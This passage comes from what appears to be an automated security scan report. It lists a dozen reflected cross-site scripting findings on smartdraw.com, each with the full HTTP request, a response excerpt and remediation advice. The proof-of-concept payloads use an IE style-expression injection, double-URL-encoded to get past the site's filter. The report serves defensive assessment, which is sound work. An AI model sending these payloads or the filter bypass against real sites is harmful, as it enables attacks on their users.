Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vrtws45owfyd0ykewtjomyf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support5cd21"style="x:expression(alert(1))"9340ce36f21/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.196. http://www.smartdraw.com/support/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 was submitted in the REST URL parameter 2. This input was echoed as 5ce71"style="x:expression(alert(1))"1f48f65f3b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /support/5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:09 GMT
Content-Length: 8739
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/
Set-Cookie: ASP.NET_SessionId=lyrquzi1ro0haeato0nugmis; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/5ce71"style="x:expression(alert(1))"1f48f65f3b6/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.197. http://www.smartdraw.com/support/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 was submitted in the REST URL parameter 2. This input was echoed as 20991"style="x:expression(alert(1))"284b0792e42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /support/x2220991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oo5bbiaclrpecvf51w0jwaml; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/x2220991"style="x:expression(alert(1))"284b0792e42/" rel="nofollow" target="_blank">
...[SNIP]...

3.198. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396ed"style%3d"x%3aexpression(alert(1))"eac095684e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 396ed"style="x:expression(alert(1))"eac095684e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /support/x22?396ed"style%3d"x%3aexpression(alert(1))"eac095684e0=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:49 GMT
Content-Length: 8781
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2smue255v4gtmz55m2l3rh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/x22/?396ed"style="x:expression(alert(1))"eac095684e0=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.199. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79e74"style="x:expression(alert(1))"af3d991af1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /support/x22?79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oc0z2245wuz2afzvjdfzixel; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/x22/?79e74"style="x:expression(alert(1))"af3d991af1d=1" rel="nofollow" target="_blank">
...[SNIP]...

3.200. http://www.smartdraw.com/training/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b was submitted in the REST URL parameter 1. This input was echoed as 68b35"style="x:expression(alert(1))"d2a8b1b996b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /training68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1y4wau550cpob2bb3amrf145; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training68b35"style="x:expression(alert(1))"d2a8b1b996b/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.201. http://www.smartdraw.com/training/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321 was submitted in the REST URL parameter 1. This input was echoed as fc351"style="x:expression(alert(1))"46b2268b321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=twmrveyjx5im0l30e30blh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/fc351"style="x:expression(alert(1))"46b2268b321/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.202. http://www.smartdraw.com/training/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec was submitted in the REST URL parameter 2. This input was echoed as 5fc3f"style="x:expression(alert(1))"219d68a09ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /training/5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wufgse55k2kojwaw3jekff45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/5fc3f"style="x:expression(alert(1))"219d68a09ec/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.203. http://www.smartdraw.com/training/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc was submitted in the REST URL parameter 2. This input was echoed as f20b1"style="x:expression(alert(1))"35c6b1442fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /training/x22f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:06 GMT
Content-Length: 8767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b52255als5xnh545vc0uboia; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/x22f20b1"style="x:expression(alert(1))"35c6b1442fc/" rel="nofollow" target="_blank">
...[SNIP]...

3.204. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccf51"style="x:expression(alert(1))"a72e20bf002 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /training/x22?ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fd1day3lcgnbupjb3jzkvr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/x22/?ccf51"style="x:expression(alert(1))"a72e20bf002=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.205. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b27"style="x:expression(alert(1))"b6d7f14376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /training/x22?e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4jdjcurlf30fkz4530xla555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training/x22/?e4b27"style="x:expression(alert(1))"b6d7f14376=1" rel="nofollow" target="_blank">
...[SNIP]...

3.206. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 was submitted in the REST URL parameter 3. This input was echoed as 20ea8"style="x:expression(alert(1))"ea712677564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/index.htm20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ioghgr45ccy40ubwykcs3pan; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/videos/demo20ea8"style="x:expression(alert(1))"ea712677564/" rel="nofollow" target="_blank">
...[SNIP]...

3.207. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /videos/demo/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa was submitted in the REST URL parameter 3. This input was echoed as d00fd"style="x:expression(alert(1))"37b4fa705aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videos/demo/d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
